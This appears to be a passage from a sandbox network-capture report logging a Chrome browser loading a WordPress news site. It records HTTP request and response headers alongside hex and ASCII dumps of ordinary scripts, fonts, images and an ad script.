                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:01 UTC219INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:59 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 15315
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:01 UTC15315INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3b 65 6c 73 65 7b 76 61 72 20 74 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 74 3d 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 74 3d 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26
                                                        Data Ascii: !function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var t;"undefined"!=typeof window?t=window:"undefined"!=typeof global?t=global:"undefined"!=typeof self&


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.449791198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:00 UTC619OUTGET /wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=aab4a5 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:01 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:59 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 2356
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:01 UTC2356INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 74 2e 70 61 72 61 6d 73 2c 6e 3d 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 2e 62 69 6e 64 28 64 6f 63 75 6d 65 6e 74 29 2c 28 74 2c 65 29 3d 3e 65 2e 73 70 6c 69 74 28 22 2e 22 29 2e 72 65 64 75 63 65 28 28 74 2c 65 29 3d 3e 74 26 26 74 5b 65 5d 2c 74 29 29 2c 69 3d 28 29 3d 3e 6e 75 6c 6c 2c 73 3d 74 3d 3e 6e 75 6c 6c 3d 3d 3d 74 7c 7c 74 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 22 3a 74 2c 6f 3d 22 77 63 2f 73 74 6f 72 65 2f 63 68 65 63 6b 6f 75 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 77 69 6e 64 6f 77 2e 77 70 26 26 77 69 6e 64 6f 77 2e 77 70 2e 64 61 74 61 26 26 77 69 6e 64 6f 77 2e 77 70 2e 64 61 74 61 2e 64 69
                                                        Data Ascii: !function(t){"use strict";const e=t.params,n=(document.querySelector.bind(document),(t,e)=>e.split(".").reduce((t,e)=>t&&t[e],t)),i=()=>null,s=t=>null===t||t===undefined?"":t,o="wc/store/checkout";function a(t){window.wp&&window.wp.data&&window.wp.data.di


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.449795198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:01 UTC591OUTGET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:01 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:59 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 4776
                                                        Connection: close
                                                        Last-Modified: Mon, 23 Dec 2024 13:58:53 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:01 UTC4776INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53
                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toS


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.449793188.114.97.34435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:01 UTC676OUTGET /forms/dazzled-shocked-individual-dressed-in-casual-shirt.png HTTP/1.1
                                                        Host: static.mailster.co
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:01 UTC178INHTTP/1.1 403 Forbidden
                                                        Server: cloudflare
                                                        Date: Tue, 11 Mar 2025 18:03:01 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 553
                                                        Connection: close
                                                        CF-RAY: 91ecf7569b63c495-SEA
                                                        2025-03-11 18:03:01 UTC553INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.44979645.77.88.114435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:01 UTC795OUTGET /ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank&cb=0.27459611524525585&ref=https%3A//hardylive.com/&uri=https%3A//hardylive.com/category/eprint/ HTTP/1.1
                                                        Host: g.adspeed.net
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:02 UTC349INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:01 GMT
                                                        Content-Type: application/x-javascript; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                        Pragma: no-cache
                                                        Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
                                                        Vary: Accept-Encoding
                                                        2025-03-11 18:03:02 UTC1001INData Raw: 33 64 64 0d 0a 76 61 72 20 61 73 64 61 74 65 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 71 3d 27 26 74 7a 3d 27 2b 61 73 64 61 74 65 2e 67 65 74 54 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 28 29 2f 36 30 20 2b 27 26 63 6b 3d 27 2b 28 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3f 27 59 27 3a 27 4e 27 29 20 2b 27 26 6a 76 3d 27 2b 28 6e 61 76 69 67 61 74 6f 72 2e 6a 61 76 61 45 6e 61 62 6c 65 64 28 29 3f 27 59 27 3a 27 4e 27 29 20 2b 27 26 73 63 72 3d 27 2b 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 27 78 27 2b 73 63 72 65 65 6e 2e 68 65 69 67 68 74 2b 27 78 27 2b 73 63 72 65 65 6e 2e 63 6f 6c 6f 72 44 65 70 74 68 20 2b 27 26 7a 3d 27 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 2b 27 26 78 3d 30 2e 30 30 31 36 35 32 30 30 32 33 33
                                                        Data Ascii: 3ddvar asdate=new Date();var q='&tz='+asdate.getTimezoneOffset()/60 +'&ck='+(navigator.cookieEnabled?'Y':'N') +'&jv='+(navigator.javaEnabled()?'Y':'N') +'&scr='+screen.width+'x'+screen.height+'x'+screen.colorDepth +'&z='+Math.random() +'&x=0.00165200233


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.449798198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:01 UTC590OUTGET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:02 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:00 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 9141
                                                        Connection: close
                                                        Last-Modified: Fri, 14 Jun 2024 14:11:12 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:02 UTC9141INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 32 30 35 38 3a 28 74 2c 65 2c 72 29 3d 3e 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 7b 6e 6f 74 5f 73 74 72 69 6e 67 3a 2f 5b 5e 73 5d 2f 2c 6e 6f 74 5f 62 6f 6f 6c 3a 2f 5b 5e 74 5d 2f 2c 6e 6f 74 5f 74 79 70 65 3a 2f 5b 5e 54 5d 2f 2c 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 3a 2f 5b 5e 76 5d 2f 2c 6e 75 6d 62 65 72 3a 2f 5b 64 69 65 66 67 5d 2f 2c 6e 75 6d 65 72 69 63 5f 61 72 67 3a 2f 5b 62 63 64 69 65 66 67 75 78 58 5d 2f 2c 6a 73 6f 6e 3a 2f 5b 6a 5d 2f 2c 6e 6f 74 5f 6a 73 6f 6e 3a 2f 5b 5e 6a 5d 2f 2c 74 65 78 74 3a 2f 5e 5b 5e 5c 78 32
                                                        Data Ascii: /*! This file is auto-generated */(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.449799198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:03 UTC432OUTGET /wp-content/themes/jnews/assets/dist/image/preloader.gif HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:03 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:02 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 4399
                                                        Connection: close
                                                        Last-Modified: Wed, 13 Nov 2024 21:12:02 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:03 UTC4399INData Raw: 47 49 46 38 39 61 64 00 4b 00 f3 00 00 f0 f0 f0 f4 f4 f4 f1 f1 f1 f2 f2 f2 f8 f8 f8 ef ef ef ed ed ed f3 f3 f3 f5 f5 f5 ee ee ee f6 f6 f6 f7 f7 f7 ff ff ff 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 03 00 0c 00 2c 00 00 00 00 64 00 4b 00 00 04 6c 90 ac 49 ab bd 38 eb cd bb c7 d2 27 8e 64 69 9e 68 aa ae 6c eb be 70 2c cf 74 6d df 78 ae ef 7c ef ff c0 a0 70 48 2c 1a 8f c8 a4 72 c9 6c 3a 9f d0 a8 74 4a ad 5a af d8 ac 76 cb ed 7a bf e0 b0 78 4c 2e 9b cf e8 b4 7a cd 6e bb df f0 b8 7c 4e af db ef f8 bc 7e cf ef fb ff 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 1a 21 73 04 11 00 21 f9 04 05 03 00 0c 00 2c 00 00 00 00 0b 00 4b 00 00 04 7e f0 c8 80 90 52 2c 8f 49 2f 56 db 41 59 57 26 4c 95 a7 0d c1 a8 32 5b db 95 b0
                                                        Data Ascii: GIF89adK!NETSCAPE2.0!,dKlI8'dihlp,tmx|pH,rl:tJZvzxL.zn|N~!s!,K~R,I/VAYW&L2[


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.449800198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:03 UTC702OUTGET /wp-content/themes/jnews/assets/dist/font/jegicon.woff HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        Origin: https://hardylive.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: sbjs_migrations=1418474375998%3D1
                                                        2025-03-11 18:03:04 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:02 GMT
                                                        Content-Type: font/woff
                                                        Content-Length: 7144
                                                        Connection: close
                                                        Last-Modified: Wed, 13 Nov 2024 21:12:02 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:04 UTC7144INData Raw: 77 4f 46 46 4f 54 54 4f 00 00 1b e8 00 0b 00 00 00 00 2c dc 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 46 46 20 00 00 01 08 00 00 18 56 00 00 27 8e d0 16 d5 8a 46 46 54 4d 00 00 19 60 00 00 00 1a 00 00 00 1c 76 1f c4 ec 47 44 45 46 00 00 19 7c 00 00 00 1d 00 00 00 20 00 5b 00 04 4f 53 2f 32 00 00 19 9c 00 00 00 48 00 00 00 60 51 cb 5e e0 63 6d 61 70 00 00 19 e4 00 00 00 99 00 00 01 86 20 f8 d3 95 68 65 61 64 00 00 1a 80 00 00 00 29 00 00 00 36 0b 00 63 19 68 68 65 61 00 00 1a ac 00 00 00 18 00 00 00 24 04 2f 02 03 68 6d 74 78 00 00 1a c4 00 00 00 29 00 00 00 60 05 7e 01 01 6d 61 78 70 00 00 1a f0 00 00 00 06 00 00 00 06 00 2e 50 00 6e 61 6d 65 00 00 1a f8 00 00 00 dd 00 00 01 86 33 c2 c7 aa 70 6f 73 74 00 00 1b d8 00 00 00
                                                        Data Ascii: wOFFOTTO,CFF V'FFTM`vGDEF| [OS/2H`Q^cmap head)6chhea$/hmtx)`~maxp.Pname3post


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.449802198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:04 UTC759OUTGET /wp-content/plugins/ajax-login-and-registration-modal-popup/assets/img/cd-icon-close.svg HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core-compiled.css?ver=56
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:05 UTC208INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:03 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 603
                                                        Connection: close
                                                        Last-Modified: Wed, 18 Dec 2024 14:55:36 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:05 UTC603INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.2.449803198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:04 UTC664OUTGET /wp-content/themes/jnews/assets/dist/frontend.min.js?ver=1.0.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Range: bytes=163620-308954
                                                        If-Range: Wed, 13 Nov 2024 21:11:58 GMT
                                                        2025-03-11 18:03:05 UTC276INHTTP/1.1 206 Partial Content
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:03 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 145335
                                                        Connection: close
                                                        Last-Modified: Wed, 13 Nov 2024 21:11:58 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Range: bytes 163620-308954/308955
                                                        2025-03-11 18:03:05 UTC16108INData Raw: 5f 66 69 65 6c 64 3f 28 74 68 69 73 2e 73 65 61 72 63 68 5f 66 69 65 6c 64 2e 76 61 6c 28 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 74 65 78 74 29 2c 74 68 69 73 2e 73 65 61 72 63 68 5f 66 69 65 6c 64 2e 61 64 64 43 6c 61 73 73 28 22 64 65 66 61 75 6c 74 22 29 29 3a 28 74 68 69 73 2e 73 65 61 72 63 68 5f 66 69 65 6c 64 2e 76 61 6c 28 22 22 29 2c 74 68 69 73 2e 73 65 61 72 63 68 5f 66 69 65 6c 64 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 64 65 66 61 75 6c 74 22 29 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 61 72 63 68 5f 72 65 73 75 6c 74 73 5f 6d 6f 75 73 65 75 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3b 69 66 28 6e 3d 65 28 74 2e 74 61 72 67 65 74 29 2e 68 61 73 43 6c 61 73 73 28 22 61 63 74 69 76 65 2d 72 65 73 75 6c 74 22 29 3f 65
                                                        Data Ascii: _field?(this.search_field.val(this.default_text),this.search_field.addClass("default")):(this.search_field.val(""),this.search_field.removeClass("default"))},n.prototype.search_results_mouseup=function(t){var n;if(n=e(t.target).hasClass("active-result")?e
